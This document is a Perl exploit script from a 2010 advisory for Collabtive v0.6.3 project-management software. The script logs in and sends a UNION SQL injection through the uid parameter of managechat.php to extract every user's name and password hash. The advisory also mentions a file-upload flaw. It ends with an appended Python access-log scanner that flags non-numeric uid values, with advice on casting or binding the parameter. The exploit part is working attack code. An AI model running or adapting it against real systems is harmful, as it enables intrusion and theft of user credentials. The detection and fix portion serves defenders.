#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;
#                         \#'#/
#                         (-.-)
#------------------oOO---(_)---OOo-----------------
#|         __              __                      |
#|   _____/ /_____ ______/ /_________ ______  _____|
#|  / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/  |
#| (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )   |
#|/____/\__/\__,_/_/  /_.___/\__,_/\__, /____/    |
#|     Security Research Division /____/     2o1o |
#--------------------------------------------------
#|     Collabtive v0.6.3 Multiple Vulnerabilities  |
#--------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive is web-based project management software.
#                     The project started in November 2007. It is open-source
#                     software and offers an alternative to proprietary tools
#                     such as Basecamp. Collabtive is written in PHP.
#
#                     Collabtive is developed by a professional team.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
#                     12: $userto_id = getArrayVal($_GET, "uid");
#
#                     64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
#                     The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
#                     See http://www.milw0rm.com/exploits/7076 for more details.
#

if(!$ARGV[5])
{
    print "\n                     \\#'#/ ";
    print "\n                     (-.-)";
    print "\n ---------------oOO---(_)---OOo---------------";
    print "\n |   Collabtive v0.6.3 SQL Injection Exploit  |";
    print "\n |                               coded by DNX |";
    print "\n ---------------------------------------------";
    print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
    print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
    print "\n[!] Options:";
    print "\n    -user [text]       Username";
    print "\n    -pass [text]       Password";
    print "\n    -p    [ip:port]    Proxy support";
    print "\n";
    exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");

my $ua     = LWP::UserAgent->new();
my $cookie = HTTP::Cookies->new();
my $host   = $ARGV[0];
my $path   = $ARGV[1];
my $target = "http://".$host.$path;
my $user   = "";
my $pass   = "";

if($options{"p"})
{
    $ua->proxy('http', "http://".$options{"p"});
}
if($options{"user"})
{
    $user = $options{"user"};
}
if($options{"pass"})
{
    $pass = $options{"pass"};
}

print "[!] Exploiting...\n\n";
exploit();
print "\n[!] Done\n";

sub exploit
{
    ##############
    # make login #
    ##############
    my $url = $target."manageuser.php?action=login";
    my $res = $ua->post($url, [username => $user, pass => $pass]);
    $cookie->extract_cookies($res);
    $ua->cookie_jar($cookie);

    ############################
    # get users with passwords #
    ############################
    $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
    $res = $ua->get($url);
    my $content = $res->content;
    my @c = split(/<br \/>/, $content);
    foreach (@c)
    {
        if($_ =~ /<b>(.*?):<\/b> (.*)/)
        {
            print $1.":".$2."\n";
        }
    }
}
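As an added defender-side example (not part of DNX's advisory or of the Collabtive code base): the root cause above is that managechat.php takes uid straight from $_GET into an IN(...) clause, so a plain integer is the only legitimate value. The Python below scans Apache combined-format access-log lines (constructed here; the format and the /managechat.php path are assumptions) and flags every request whose uid is not a plain integer.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache combined format), not real traffic.
# The second request carries the uid payload quoted in the advisory, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2010:10:01:02 +0200] "GET /collabtive/managechat.php?action=pull&uid=7&start=0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jun/2010:10:03:15 +0200] "GET /collabtive/managechat.php?action=pull&uid=0)%20union%20select%201,2,name,4,5,6,pass%20from%20user/* HTTP/1.1" 200 2048 "-" "libwww-perl/5.834"
10.0.0.5 - - [05/Jun/2010:10:04:44 +0200] "POST /collabtive/manageuser.php?action=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Only the fields the check needs: client IP, timestamp, method, request URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate uid is a bare unsigned integer; anything else cannot be a valid user id.
INT_RE = re.compile(r'^\d+$')

def parse_line(line):
    """Return the matched fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_uid(url):
    """Return the (percent-decoded) uid value when the request targets managechat.php
    and uid is not a plain integer; None otherwise."""
    parts = urlsplit(url)
    if not parts.path.endswith("/managechat.php"):
        return None
    for uid in parse_qs(parts.query).get("uid", []):  # parse_qs already decodes %XX
        if not INT_RE.match(uid):
            return uid
    return None

def scan(log_text):
    """Return a list of (ip, timestamp, decoded uid) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bad = suspicious_uid(rec["url"])
        if bad is not None:
            hits.append((rec["ip"], rec["ts"], bad))
    return hits

if __name__ == "__main__":
    for ip, ts, uid in scan(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric uid on managechat.php: {uid!r}")
```

The same integer-only rule applied server-side (casting uid to an integer before it reaches the query, or binding it as a parameter) is what removes the injection; the log check only tells you whether anyone has already tried it.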